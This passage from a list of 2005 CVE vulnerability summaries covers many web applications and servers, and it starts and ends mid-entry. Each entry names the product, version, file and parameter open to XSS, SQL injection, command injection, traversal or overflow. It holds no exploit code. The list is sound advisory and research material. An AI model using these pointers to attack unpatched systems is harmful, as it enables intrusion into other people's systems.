to spoof web content and poison web caches via hex-encoded CRLF ("%0d%0a") sequences in the (1) products_id or (2) pid parameter to index.php or (3) goto parameter to banner.php. [CVE-2005-1950] hints.pl in Webhints 1.03 allows remote attackers to execute arbitrary commands via shell metacharacters in the argument. [CVE-2005-1945] Cross-site scripting (XSS) vulnerability in the convert_highlite_words function in Invision Blog before 1.1.2 Final allows remote attackers to inject arbitrary web script or HTML via double hex encoded highlight data. [CVE-2005-1936] Unknown vulnerability in the web server for the ESS/ Network Controller for Xerox Document Centre 240 through 555 running System Software 27.18.017 and earlier allows attackers to "gain unauthorized access." [CVE-2005-1921] Eval injection vulnerability in PEAR XML_RPC 1.3.0 and earlier (aka XML-RPC or xmlrpc) and PHPXMLRPC (aka XML-RPC For PHP or php-xmlrpc) 1.1 and earlier, as used in products such as (1) WordPress, (2) Serendipity, (3) Drupal, (4) egroupware, (5) MailWatch, (6) TikiWiki, (7) phpWebSite, (8) Ampache, and others, allows remote attackers to execute arbitrary PHP code via an XML file, which is not properly sanitized before being used in an eval statement. [CVE-2005-1910] SQL injection vulnerability in login.asp for WWWeb Concepts Events System 1.0 allows remote attackers to execute arbitrary SQL commands via the password. [CVE-2005-1909] The web server control panel in 602LAN SUITE 2004 allows remote attackers to make it more difficult for the administrator to read portions of log files via a "</pre><!-" sequence in an HTTP GET request in the logon, possibly due to a cross-site scripting (XSS) vulnerability. [CVE-2005-1908] Perception LiteWeb allows remote attackers to bypass access controls for files via an extra leading / (slash) or leading \ (backslash) in the URL. [CVE-2005-1901] Multiple cross-site scripting (XSS) vulnerabilities in Sawmill before 7.1.6 allow remote attackers to inject arbitrary web script or HTML via (1) the username in the Add User window or (2) the license key in the Licensing page. [CVE-2005-1895] Cross-site scripting (XSS) vulnerability in FlatNuke 2.5.3 allows remote attackers to inject arbitrary web script or HTML via the border or back parameters to (1) help.php or (2) footer.php. [CVE-2005-1893] FlatNuke 2.5.3 allows remote attackers to obtain sensitive information via invalid parameters to certain scripts, which leaks the web document root in an error message. [CVE-2005-1892] FlatNuke 2.5.3 allows remote attackers to cause a denial of service or obtain sensitive information via (1) a direct request to foot_news.php, which triggers an infinite loop, or (2) direct requests to unknown scripts, which reveals the web document root in an error message. [CVE-2005-1888] Cross-site scripting (XSS) vulnerability in MediaWiki before 1.4.5 allows remote attackers to inject arbitrary web script via HTML attributes in page templates. [CVE-2005-1886] Cross-site scripting (XSS) vulnerability in view.php in YaPiG 0.92b, 0.93u and 0.94u allows remote attackers to inject arbitrary web script or HTML via (1) the phid parameter or (2) unknown parameters when posting a new comment. [CVE-2005-1877] Cross-site scripting (XSS) vulnerability in view_ticket.php in Lpanel 1.59 and earlier allows remote attackers to inject arbitrary web script or HTML and obtain sensitive information via the pid parameter. [CVE-2005-1872] Buffer overflow in the administrative console in IBM WebSphere Application Server 5.x, when the global security option is enabled, allows remote attackers to execute arbitrary code. [CVE-2005-1866] Cross-site scripting (XSS) vulnerability in calendar.php in Calendarix Advanced 1.5 allows remote attackers to inject arbitrary web script or HTML via the year parameter. [CVE-2005-1838] Multiple cross-site scripting vulnerabilities in castnewPost.asp in Liberum Help Desk 0.97.3 allow remote attackers to inject arbitrary web script or HTML via the (1) Email, (2) Title, or (3) Description fields. [CVE-2005-1836] NEXTWEB (i)Site allows remote attackers to cause a denial of service (error 500) via a crafted HTTP request, possibly involving wildcard requests for .jsp files. [CVE-2005-1835] NEXTWEB (i)Site stores databases under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information via a direct request to databases/Users.mdb. [CVE-2005-1834] SQL injection vulnerability in login.asp in NEXTWEB (i)Site allows remote attackers to execute arbitrary SQL commands and bypass authentication via the password field. [CVE-2005-1832] Multiple cross-site scripting (XSS) vulnerabilities in MyBulletinBoard (MyBB) 1.00 RC4 and earlier allow remote attackers to execute arbitrary web script or HTML via the (1) forums, (2) version, or (3) limit parameter to misc.php, (4) page or (5) datecut parameter to forumdisplay.php, (6) username, (7) email, or (8) email2 parameter to member.php, (9) page or (10) usersearch parameter to memberlist.php, (11) pid or (12) tid parameter to showthread.php, or (13) tid parameter to printthread.php. [CVE-2005-1823] Multiple cross-site scripting (XSS) vulnerabilities in Qualiteam X-Cart 4.0.8 allow remote attackers to inject arbitrary web script or HTML via the (1) cat or (2) printable parameter to home.php, (3) productid or (4) mode parameter to product.php, (5) id parameter to error_message.php, (6) section parameter to help.php, (7) mode parameter to orders.php, (8) mode parameter to register.php, (9) mode parameter to search.php, or the (10) gcid or (11) gcindex parameter to giftcert.php. [CVE-2005-1819] Cross-site scripting (XSS) vulnerability in NikoSoft WebMail before 0.11.0 allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2005-1814] Stack-based buffer overflow in PicoWebServer 1.0 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a long URL. [CVE-2005-1811] Cross-site scripting (XSS) vulnerability in usercp.php for MyBulletinBoard (MyBB) allows remote attackers to inject arbitrary web script or HTML via the website field in a user profile. [CVE-2005-1803] Multiple cross-site scripting (XSS) vulnerabilities in Net Portal Dynamic System (NPDS) 5.0 allow remote attackers to inject arbitrary web script or HTML via the language parameter to (1) admin.php, or (2) powerpack_f.php, (3) the sitename parameter to sdv_infos.php, (4) the categories parameter to faq.php, (5) the lettre parameter to the glossaire module, (6) the title parameter to reviews.php, or (7) the image_subject parameter to reply.php. [CVE-2005-1800] Cross-site scripting (XSS) vulnerability in Jaws Glossary gadget 0.4 to 0.5.1 allows remote attackers to inject arbitrary web script or HTML via the term parameter in a view or ViewTerm action to index.php. [CVE-2005-1799] Cross-site scripting (XSS) vulnerability in FreeStyle Wiki 3.5.7 and WikiLite (FSWikiLite) .10 allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2005-1796] Format string vulnerability in the curses_msg function in the Ncurses interface (ec_curses.c) for Ettercap before 0.7.3 allows remote attackers to execute arbitrary code. [CVE-2005-1783] BookReview beta 1.0 allows remote attackers to obtain the path of the web server via certain parameters to search.htm, possibly due to a search[string] parameter with a missing value or an incorrect submit[type] value, which reveals the path in the resulting error message. NOTE: it is not clear whether BookReview is available to the public. If not, then it should not be included in CVE. [CVE-2005-1782] Multiple cross-site scripting (XSS) vulnerabilities in BookReview beta 1.0 allow remote attackers to inject arbitrary web script or HTML via the node parameter to (1) add_review.htm, (2) suggest_review.htm, (3) suggest_category.htm, (4) add_booklist.htm, or (5) add_url.htm, the isbn parameter to (6) add_review.htm, (7) add_contents.htm, (8) add_classification.htm, the (9) chapters parameter to the add_contents page in index.php (aka add_contents.htm), (10) the user parameter to contact.htm, or (11) the submit[string] parameter to search.htm. NOTE: it is not clear whether BookReview is available to the public. If not, then it should not be included in CVE. [CVE-2005-1779] SQL injection vulnerability in password.asp in MaxWebPortal 1.35, 1.36, 2.0, and 20050418 Next allows remote attackers to execute arbitrary SQL commands via the memKey parameter. [CVE-2005-1778] Cross-site scripting (XSS) vulnerability in readpmsg.php in PostNuke 0.750 allows remote attackers to inject arbitrary web script or HTML via the start parameter. [CVE-2005-1774] WEB-DAV Linux File System (davfs2) 0.2.3 does not properly enforce Unix permissions, which allows local users to write arbitrary files on a davfs2 mounted filesystem. [CVE-2005-1769] Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.0 through 1.4.4 allow remote attackers to inject arbitrary web script or HTML via unknown attack vectors in (1) the URL or (2) an e-mail message. [CVE-2005-1757] Buffer overflow in the Modweb agent for Novell NetMail 3.52 before 3.52C, when renaming folders, may allow attackers to execute arbitrary code. [CVE-2005-1756] Cross-site scripting (XSS) vulnerability in the ModWeb agent for Novell NetMail 3.52 before 3.52C allows remote attackers to inject arbitrary web script or HTML via calendar display fields. [CVE-2005-1749] Buffer overflow in BEA WebLogic Server and WebLogic Express 6.1 Service Pack 4 allows remote attackers to cause a denial of service (CPU consumption from thread looping). [CVE-2005-1748] The embedded LDAP server in BEA WebLogic Server and Express 8.1 through Service Pack 4, and 7.0 through Service Pack 5, allows remote anonymous binds, which may allow remote attackers to view user entries or cause a denial of service. [CVE-2005-1747] Multiple cross-site scripting (XSS) vulnerabilities in BEA WebLogic Server and Express 8.1 through Service Pack 4, and 7.0 through Service Pack 6, allow remote attackers to inject arbitrary web script or HTML, and possibly gain administrative privileges, via the (1) j_username or (2) j_password parameters in the login page (LoginForm.jsp), (3) parameters to the error page in the Administration Console, (4) unknown vectors in the Server Console while the administrator has an active session to obtain the ADMINCONSOLESESSION cookie, or (5) an alternate vector in the Server Console that does not require an active session but also leaks the username and password. [CVE-2005-1746] The cluster cookie parsing code in BEA WebLogic Server 7.0 through Service Pack 5 attempts to contact any host or port specified in a cookie, even when it is not in the cluster, which allows remote attackers to cause a denial of service (cluster slowdown) via modified cookies. [CVE-2005-1745] The UserLogin control in BEA WebLogic Portal 8.1 through Service Pack 3 prints the password to standard output when an incorrect login attempt is made, which could make it easier for attackers to guess the correct password. [CVE-2005-1744] BEA WebLogic Server and WebLogic Express 7.0 through Service Pack 5 does not log out users when an application is redeployed, which allows those users to continue to access the application without having to log in again, which may be in violation of newly changed security constraints or role mappings. [CVE-2005-1743] BEA WebLogic Server and WebLogic Express 8.1 through Service Pack 3 and 7.0 through Service Pack 5 does not properly handle when a security provider throws an exception, which may cause WebLogic to use incorrect identity for the thread, or to fail to audit security exceptions. [CVE-2005-1742] BEA WebLogic Server and WebLogic Express 8.1 SP2 and SP3 allows users with the Monitor security role to "shrink or reset JDBC connection pools." [CVE-2005-1735] Multiple cross-site scripting (XSS) vulnerabilities in PROMS before 0.11 allow remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2005-1733] Cookie Cart stores the password file under the web document root with insufficient access control, which allows remote attackers to obtain usernames and encrypted passwords via a direct request to passwd.txt. [CVE-2005-1716] TOPo 2.2 (2.2.178) stores data files in the data directory under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information such as client IP addresses. [CVE-2005-1715] Cross-site scripting (XSS) vulnerability in index.php for TOPo 2.2 (2.2.178) allows remote attackers to inject arbitrary web script or HTML via the (1) m, (2) s, (3) ID, or (4) t parameters, or the (5) field name, (6) Your Web field, or (7) email field in the comments section. [CVE-2005-1714] Cross-site scripting (XSS) vulnerability in NetWin SurgeMail 3.0c2 allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2005-1713] Multiple cross-site scripting (XSS) vulnerabilities in Serendipity 0.8 allow remote attackers to inject arbitrary web script or HTML via the (1) templatedropdown and (2) shoutbox plugins. [CVE-2005-1710] Multiple cross-site scripting (XSS) vulnerabilities in Blue Coat Reporter before 7.1.2 allow remote attackers to inject arbitrary web script or HTML via (1) the username in an Add User window or (2) the license key (volatile.license_to_add parameter) in the Licensing page. [CVE-2005-1707] The fn_show_postinst function in Gentoo webapp-config before 1.10-r14 allows local users to overwrite arbitrary files via a symlink attack on the postinst.txt temporary file. [CVE-2005-1696] Multiple cross-site scripting (XSS) vulnerabilities in PostNuke 0.750 and 0.760RC3 allow remote attackers to inject arbitrary web script or HTML via the (1) skin or (2) paletteid parameter to demo.php in the Xanthia module, or (3) the serverName parameter to config.php in the Multisites (aka NS-Multisites) module. [CVE-2005-1695] Multiple cross-site scripting (XSS) vulnerabilities in the RSS module in PostNuke 0.750 and 0.760RC2 and RC3 allow remote attackers to inject arbitrary web script or HTML via the (1) rss_url parameter to magpie_slashbox.php, or the url parameter to (2) magpie_simple.php or (3) magpie_debug.php. [CVE-2005-1686] Format string vulnerability in gedit 2.10.2 may allow attackers to cause a denial of service (application crash) via a bin file with format string specifiers in the filename. NOTE: while this issue is triggered on the command line by the gedit user, it has been reported that web browsers and email clients could be configured to provide a file name as an argument to gedit, so there is a valid attack that crosses security boundaries. [CVE-2005-1684] Cross-site scripting (XSS) vulnerability in default.asp for episodex guestbook allows remote attackers to inject arbitrary web script or HTML via the Name field and other fields. [CVE-2005-1676] Multiple cross-site scripting (XSS) vulnerabilities in Groove Mobile Workspace in Groove Virtual Office before 3.1 build 2338, before 3.1a build 2364, and Groove Workspace before 2.5n build 1871 allow remote attackers to inject arbitrary web script or HTML via the (1) picture columns embedded within SharePoint lists or (2) drop-down menus in a SharePoint list. [CVE-2005-1672] Multiple cross-site scripting (XSS) vulnerabilities in Help Center Live allow remote attackers to inject arbitrary web script or HTML via the (1) find parameter to index.php, (2) name or (3) message field of a chat request, or (4) the message body when opening a trouble ticket. [CVE-2005-1669] Cross-site scripting (XSS) vulnerability in Opera 8.0 Final Build 1095 allows remote attackers to inject arbitrary web script or HTML via "javascript:" URLs when a new window or frame is opened, which allows remote attackers to bypass access restrictions and perform unauthorized actions on other domains. [CVE-2005-1668] YusASP Web Asset Manager 1.0 allows remote attackers to gain privileges via a direct request to assetmanager.asp. [CVE-2005-1663] Jeuce Personal Web Server 2.13 allows remote attackers to cause a denial of service (server crash) via a GET request beginning with "://". [CVE-2005-1662] Directory traversal vulnerability in Jeuce Personal Web Server 2.13 allows remote attackers to read arbitrary files via a .. (dot dot) in the URL. [CVE-2005-1661] Jeuce Personal Webserver 2.13 allows remote attackers to cause a denial of service (server crash) via a long GET request, possibly triggering a buffer overflow. [CVE-2005-1660] HTMLJunction EZGuestbook stores the guestbook.mdb file under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information such as the administrative password. [CVE-2005-1658] Directory traversal vulnerability in filemanager.cpp in MyServer 0.8 allows remote attackers to list the parent directory of the web root via a URL with a "..." (triple dot). [CVE-2005-1653] Cross-site scripting (XSS) vulnerability in message.htm for Woppoware PostMaster 4.2.2 (build 3.2.5) allows remote attackers to inject arbitrary web script or HTML via the email parameter. [CVE-2005-1650] The web mail service in Woppoware PostMaster 4.2.2 (build 3.2.5) generates different error messages depending on whether a user exists or not, which allows remote attackers to determine valid usernames. [CVE-2005-1648] Gurgens (GASoft) Ultimate Forum 1.0 stores the db/Genid.dat database file under the web document root with insufficient access control, which allows remote attackers to obtain and decrypt usernames and passwords. [CVE-2005-1647] Gurgens (GASoft) Guest Book 2.1 stores the db/Genid.dat database file under the web document root with insufficient access control, which allows remote attackers to obtain and decrypt usernames and passwords. [CVE-2005-1646] The default installation of Fastream NETFile FTP/Web Server 7.4.6, which supports FXP, does not require that the IP address in a PORT command be the same as the IP of the logged in user, which allows remote attackers to conduct FTP Bounce attacks to bypass firewall rules or cause a denial of service. [CVE-2005-1645] Keyvan1 ImageGallery stores the image.mdb database under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information. [CVE-2005-1644] Cross-site scripting (XSS) vulnerability in guestbook.php for 1Two Livre d'Or 1.0 allows remote attackers to inject arbitrary web script or HTML via the (1) livreornom, (2) livreoremail, or (3) livreormessage parameters. [CVE-2005-1639] SQL injection vulnerability in Sigmaweb.DLL in Sigma ISP Manager 6.6 allows remote attackers to execute arbitrary SQL commands via the (1) username, (2) password, or (3) domain fields. [CVE-2005-1634] Multiple cross-site scripting (XSS) vulnerabilities in JGS-XA JGS-Portal 3.0.2 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) anzahl_beitraege parameter to jgs_portal.php, (2) year parameter to jgs_portal_statistik.php, (3) year parameter to jgs_portal_beitraggraf.php, (4) tag parameter to jgs_portal_viewsgraf.php, (5) year parameter to jgs_portal_themengraf.php, (6) year parameter to jgs_portal_mitgraf.php, (7) id parameter to jgs_portal_sponsor.php, or (8) the Accept-Language header to jgs_portal_log.php. NOTE: this issue may stem from the same core problem as CVE-2005-1633. [CVE-2005-1628] apage.cgi in WebAPP 0.9.9.2.1, and possibly earlier versions, allows remote attackers to execute arbitrary commands via shell metacharacters in the f parameter. [CVE-2005-1622] Cross-site scripting (XSS) vulnerability in productsByCategory.asp in MetaCart e-Shop allows remote attackers to inject arbitrary web script or HTML via the strCatalog_NAME parameter. [CVE-2005-1620] Cross-site scripting (XSS) vulnerability in Skull-Splitter Guestbook 1.0, 2.0 and 2.2 allows remote attackers to inject arbitrary web script or HTML via the (1) title or (2) content of a message. [CVE-2005-1619] Multiple cross-site scripting (XSS) vulnerabilities in (1) start_page.css.php3 (aka start-page.css.php3) or (2) style.css.php3 in PHPMyChat 0.14.5 allow remote attackers to inject arbitrary web script or HTML commands via the FontName parameter. NOTE: it was later reported that 0.14.5 is also affected. [CVE-2005-1617] Willings WebCam and WebCam Lite 2.8 and earlier stores the password in memory in plaintext, which allows local users to gain sensitive information. [CVE-2005-1614] Cross-site scripting (XSS) vulnerability in viewforum.php in Ultimate PHP Board (UPB) 1.8 through 1.9.6 allows remote attackers to inject arbitrary web script or HTML via the postorder parameter. [CVE-2005-1613] Cross-site scripting (XSS) vulnerability in member.php in Open Bulletin Board (OpenBB) 1.0.8 allows remote attackers to inject arbitrary web script or HTML via the reverse parameter in a list action. [CVE-2005-1611] Cross-site scripting (XSS) vulnerability in WebX in Web Crossing 5.x allows remote attackers to inject arbitrary web script or HTML via a URL with an "@" followed by the desired script. [CVE-2005-1610] Cross-site scripting (XSS) vulnerability in security.php for Tru-Zone NukeET 3.0 and 3.1 allows remote attackers to inject arbitrary web script or HTML via a base64 encoded Codigo parameter. [CVE-2005-1607] Cross-site scripting (XSS) vulnerability in shop.cgi in Remote Cart allows remote attackers to inject arbitrary web script or HTML via the (1) merchant or (2) demo parameters. [CVE-2005-1605] Cross-site scripting (XSS) vulnerability in the guestbook for SiteStudio 1.6 allows remote attackers to inject arbitrary web script or HTML via the name field to (1) psoft.guestbook.GuestBookServ in Standalone Site Studio or (2) E-Guest_sign.pl in Integrated Site Studio with H-Sphere. [CVE-2005-1601] MRO Maximo Self Service 4 and 5 stores certain information under the web document root using file extensions that are not processed by Tomcat, which allows remote attackers to obtain sensitive information via a direct request for the file, such as MXServer.properties. [CVE-2005-1599] Cross-site scripting (XSS) vulnerability in Kryloff Technologies Subject Search Server (SSServer) 1.1 allows remote attackers to inject arbitrary web script or HTML via the "Search For" field. [CVE-2005-1597] Cross-site scripting (XSS) vulnerability in (1) search.php and (2) topics.php for Invision Power Board (IPB) 2.0.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the highlite parameter. [CVE-2005-1595] CodeThat ShoppingCart 1.3.1 stores config.ini under the web root, which allows remote attackers to obtain sensitive information via a direct request. [CVE-2005-1593] Cross-site scripting (XSS) vulnerability in catalog.php for CodeThat ShoppingCart 1.3.1 allows remote attackers to inject arbitrary web script or HTML via the id parameter. [CVE-2005-1590] The Altiris Client Service for Windows (ACLIENT.EXE) 6.0.88 allows local users to disable password protection and access the administrative interface by finding and showing the "Altiris Client Service" hidden window, disabling the password protection, disabling the "Hide client tray icon box" option, then opening the AClient tray icon and using the View Log File option, a different vulnerability than CVE-2004-2070. [CVE-2005-1587] Cross-site scripting (XSS) vulnerability in index.php for Quick.cart 0.3.0 allows remote attackers to inject arbitrary web script or HTML via the sWord parameter. [CVE-2005-1586] Quick.Forum 2.1.6 stores potentially sensitive information such as usernames, banned IP addresses, censored words, and backups under the web document root, which allows remote attackers to obtain that information via a direct request to (1) db/users.txt, (2) db/banList.txt, (3) db/censureWords.txt, or (4) backup files. [CVE-2005-1584] Cross-site scripting (XSS) vulnerability in index.php for Quick.Forum 2.1.6 allows remote attackers to inject arbitrary web script or HTML via the topic field in a NewTopic action. [CVE-2005-1582] Cross-site scripting (XSS) vulnerability in index.php for 1Two News 1.0 allows remote attackers to inject arbitrary web script or HTML via the (1) nom, (2) email, (3) siteweb, or (4) commentaire variables. [CVE-2005-1581] Cross-site scripting (XSS) vulnerability in Bug Report 1.0 allows remote attackers to inject arbitrary web script or HTML via various fields to bug_report.php, which are not filtered or quoted when processed by bug_list.php or admin/index.php. [CVE-2005-1574] Windows Media Player 9 and 10, in certain cases, allows content protected by Windows Media Digital Rights Management (WMDRM) to redirect the user to a web site to obtain a license, even when the "Acquire licenses automatically for protected content" setting is not enabled. [CVE-2005-1569] Cross-site scripting (XSS) vulnerability in DirectTopics 2.1 and 2.2 allows remote attackers to inject arbitrary web script via a javascript: URL in (1) a thread or (2) an IMG tag. [CVE-2005-1565] Bugzilla 2.17.1 through 2.18, 2.19.1, and 2.19.2, when a user is prompted to log in while attempting to view a chart, displays the password in the URL, which may allow local users to gain sensitive information from web logs or browser history. [CVE-2005-1562] Multiple SQL injection vulnerabilities in MaxWebPortal 1.3.5 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) fpassword parameter to inc_functions.asp, (2) txtAddress, (3) message, or (4) subject parameter to post_info.asp, (5) andor parameter to search.asp, (6) verkey parameter to pop_profile.asp, or (7) Remove or (8) Delete parameter to pm_delete2.asp. [CVE-2005-1561] Multiple cross-site scripting (XSS) vulnerabilities in post.asp in MaxWebPortal 1.3.5 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) mod, (2) M, or (3) type parameter. [CVE-2005-1559] The web module in Neteyes Nexusway allows remote attackers to execute arbitrary commands via hex-encoded shell metacharacters in the ip parameter for (1) nslookup.cgi or (2) ping.cgi. [CVE-2005-1558] The web module in Neteyes Nexusway allows remote attackers to bypass authentication and gain administrator privileges by setting the cyclone500_auth cookie. [CVE-2005-1557] Multiple cross-site scripting (XSS) vulnerabilities in WebApp Guestbook PRO 3.2.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) title or (2) content of a message. [CVE-2005-1555] Cross-site scripting (XSS) vulnerability in the JRun Web Server in ColdFusion MX 7.0 allows remote attackers to inject arbitrary script or HTML via the URL, which is not properly quoted in the resulting default 404 error page. [CVE-2005-1508] Multiple cross-site scripting (XSS) vulnerabilities in PwsPHP 1.2.2 allow remote attackers to inject arbitrary web script or HTML via the (1) month or (2) annee parameters to the news module, (3) nbractif or (4) annee parameters to the stats module, (5) id parameter to profil.php, (6) mb_lettre or (7) lettre parameter to memberlist.php, or (8) chaine_search, or (9) auteur_search parameter to the recherche module. [CVE-2005-1507] Buffer overflow in the Tomcat plugin in 4d WebSTAR 5.33 and 5.4 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long URL. [CVE-2005-1502] Cross-site scripting (XSS) vulnerability in MidiCart PHP Shopping Cart allows remote attackers to inject arbitrary web script or HTML via the (1) searchstring parameter to search_list.php or the (2) secondgroup or (3) maingroup parameters to item_list.php. [CVE-2005-1498] Multiple cross-site scripting (XSS) vulnerabilities in myBloggie 2.1.1 allow remote attackers to inject arbitrary web script or HTML via the (1) year parameter in viewmode.php, or the (2) cat_id, (3) month_no, or (4) post_id parameter in index.php, which are not properly sanitized before they are displayed in an error message. NOTE: issues 2, 3, and 4 may be due to a problem in associated products rather than myBloggie itself. [CVE-2005-1494] Multiple cross-site scripting (XSS) vulnerabilities in admin.cgi in MegaBook 2.0 and 2.1 allow remote attackers to inject arbitrary web script or HTML via the (1) entryid or (2) password parameter. [CVE-2005-1492] Cross-site scripting (XSS) vulnerability in user.cgi in Gossamer Threads Links SQL 2.x and 3.0 allows remote attackers to inject arbitrary web script or HTML via the url parameter. [CVE-2005-1491] Merak Mail Server 8.0.3 with Icewarp Web Mail 5.4.2 allows remote authenticated users to (1) move their home directory via viewaction.html or (2) move arbitrary files via the importfile parameter to importaction.html. [CVE-2005-1490] Merak Mail Server 8.0.3 with Icewarp Web Mail 5.4.2, when the mailbox.dat file does not exist, allows remote authenticated users to determine if a file exists via the folder parameter to attachment.html. [CVE-2005-1489] Unknown vulnerability in Merak Mail Server 8.0.3 with Icewarp Web Mail 5.4.2 allows remote authenticated users to obtain the full path of the server via certain requests to (1) calendar_addevent.html, (2) calendar_event.html, or (3) calendar_task.html. [CVE-2005-1488] Multiple cross-site scripting (XSS) vulnerabilities in Merak Mail Server 8.0.3 with Icewarp Web Mail 5.4.2 allow remote authenticated users to inject arbitrary web script or HTML via (1) the E-mail address, Note, or Public Certificate fields to address.html, (2) addressaction.html, (3) the Signature field to settings.html, or (4) the Shared calendars to calendarsettings.html. [CVE-2005-1486] Multiple cross-site scripting vulnerabilities in FishCart 3.1 allow remote attackers to inject arbitrary web script or HTML via the (1) trackingnum, (2) reqagree, or (3) m parameter to upstracking.php or (4) nlst parameter to display.php. NOTE: the vendor was not able to reproduce some of the reported vectors but believes that they have been addressed. The original researcher is known to be unreliable. [CVE-2005-1483] Multiple cross-site scripting (XSS) vulnerabilities in ArticleLive 2005 allow remote attackers to inject arbitrary web script or HTML via the (1) Query, (2) Username, (3) LastName, (4) Biography, or (5) BlogId parameter. [CVE-2005-1477] The install function in Firefox 1.0.3 allows remote web sites on the browser's whitelist, such as update.mozilla.org or addon.mozilla.org, to execute arbitrary Javascript with chrome privileges, leading to arbitrary code execution on the system when combined with vulnerabilities such as CVE-2005-1476, as demonstrated using a javascript: URL as the package icon and a cross-site scripting (XSS) attack on a vulnerable whitelist site. [CVE-2005-1471] Heap-based buffer overflow in RSA SecurID Web Agent 5, 5.2, and 5.3 allows remote attackers to execute arbitrary code via crafted chunked-encoding data. [CVE-2005-1448] Cross-site scripting (XSS) vulnerability in the BBCode plugin for Serendipity before 0.8 allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2005-1444] Multiple cross-site scripting (XSS) vulnerabilities in SitePanel 2.6.1 and earlier (SitePanel2) allows remote attackers to inject arbitrary web script or HTML via (1) the v, show, or sec_name parameters to main.php, (2) the inadmin, newsev, or postid parameters to 5.php, or (3) the id parameter to 0.php. [CVE-2005-1443] Multiple cross-site scripting (XSS) vulnerabilities in index.php for Invision Power Board (IPB) 2.0.3 and 2.1 Alpha 2 allows remote attackers to inject arbitrary web script or HTML via the (1) act, (2) Members, (3) calendar, or (4) HID parameters. [CVE-2005-1440] Multiple cross-site scripting (XSS) vulnerabilities in ViArt Shop Enterprise 2.1.6 allow remote attackers to inject arbitrary web script or HTML via (1) various parameters to basket.php, (2) the nickname, email, topic, and message fields in forum.php, as demonstrated using forum_new_thread.php and forum_thread.php, (3) the page parameter to page.php, (4) category_id and item_id parameters to reviews.php, (5) the category_id parameter to product_details.php, (6) the category_id or search_string parameters to products.php, or (7) the rp or page parameters to news_view.php. [CVE-2005-1436] Multiple cross-site scripting (XSS) vulnerabilities in osTicket allow remote attackers to inject arbitrary web script or HTML via (1) the t parameter to view.php, (2) the osticket_title parameter to header.php, (3) the em parameter to admin_login.php, (4) the e parameter to user_login.php, (5) the err parameter to open_submit.php, or (6) the name and subject fields when adding a ticket. [CVE-2005-1435] Open WebMail (OWM) before 2.51 20050430 allows remote authenticated users to execute arbitrary commands via shell metacharacters in a filename. [CVE-2005-1427] Uapplication Uphotogallery stores the database under the web document root, which allows remote attackers to obtain sensitive information via a direct request to uphotogallery.mdb. [CVE-2005-1426] Uapplication Ublog Reload stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for mdb-database/blog.mdb (aka mdb-database/blog.msb). [CVE-2005-1425] Uapplication Uguestbook 1.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for mdb-database/guestbook.mdb. [CVE-2005-1417] Multiple SQL injection vulnerabilities in MaxWebPortal 2.x, 1.35, and other versions allow remote attackers to execute arbitrary SQL commands via (1) article_popular.asp, (2) arguments to dl_popular.asp, (3) arguments to links_popular.asp, (4) arguments to pic_popular.asp, (5) article_rate.asp, (6) dl_rate.asp, (7) links_rate.asp, (8) pic_rates.asp, (9) article_toprated.asp, (10) dl_toprated.asp, (11) links_toprated.asp, (12) arguments to pic_toprated.asp, or (13) the TOPIC_ID or Forum_ID parameters to custom_link.asp. [CVE-2005-1416] Directory traversal vulnerability in 04WebServer 1.81 allows remote attackers to read files outside of the web root but within the installation folder. [CVE-2005-1405] HTTP response splitting vulnerability in the @SetHTTPHeader function in Lotus Domino 6.5.x before 6.5.4 and 6.0.x before 6.0.5 allows attackers to poison the web cache via malicious applications. [CVE-2005-1403] Multiple cross-site scripting (XSS) vulnerabilities in JustWilliam's Amazon Webstore 04050100 allow remote attackers to inject arbitrary web script or HTML via the (1) image parameter to closeup.php, the (2) currentIsExpanded or (3) searchFor parameters to index.php, (4) the currentNumber parameter to software_CAD_Technical_60002_uk.htm, or (5) a cookie. [CVE-2005-1388] Cross-site scripting (XSS) vulnerability in SURVIVOR before 0.9.6 allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2005-1386] PHP-Nuke 7.6 and earlier allows remote attackers to obtain sensitive information via a direct request to (1) ipban.php, (2) db.php, (3) lang-norwegian.php, (4) lang-indonesian.php, (5) lang-greek.php, (6) a request to Web_Links with the portuguese language (lang-portuguese.php), (7) a request to Web_Links with the indonesian language (lang-indonesian.php), (8) a request to the survey module with the indonesian language (lang-indonesian.php), (9) a request to the Reviews module with the portuguese language, or (10) a request to the Journal module with the portuguese language, which reveal the path in an error message. [CVE-2005-1383] The OHS component 1.0.2 through 10.x, when UseWebcacheIP is disabled, in Oracle Application Server allows remote attackers to bypass HTTP Server mod_access restrictions via a request to the webcache TCP port 7778. [CVE-2005-1382] The webcacheadmin module in Oracle Webcache 9i allows remote attackers to corrupt arbitrary files via a full pathname in the cache_dump_file parameter. [CVE-2005-1381] Multiple cross-site scripting (XSS) vulnerabilities in Oracle Webcache 9i allow remote attackers to inject arbitrary web script or HTML via the (1) cache_dump_file or (2) PartialPageErrorPage parameter. [CVE-2005-1380] Cross-site scripting (XSS) vulnerability in BEA Admin Console 8.1 allows remote attackers to execute arbitrary web script or HTML via the server parameter to a JndiFramesetAction action. [CVE-2005-1374] Multiple cross-site scripting (XSS) vulnerabilities in Claroline 1.5.3 through 1.6 Release Candidate 1, and possibly Dokeos, allow remote attackers to inject arbitrary web script or HTML via (1) exercise_result.php, (2) exercice_submit.php, (3) agenda.php, (4) learningPathList.php, (5) learningPathAdmin.php, (6) learningPath.php, (7) userLog.php, (8) tool parameter to toolaccess_details.php, (9) data parameter to user_access_details.php, or (10) coursePath parameter to myagenda.php. [CVE-2005-1367] Pico Server (pServ) 3.2 and earlier allows local users to read arbitrary files as the pServ user via a symlink to a 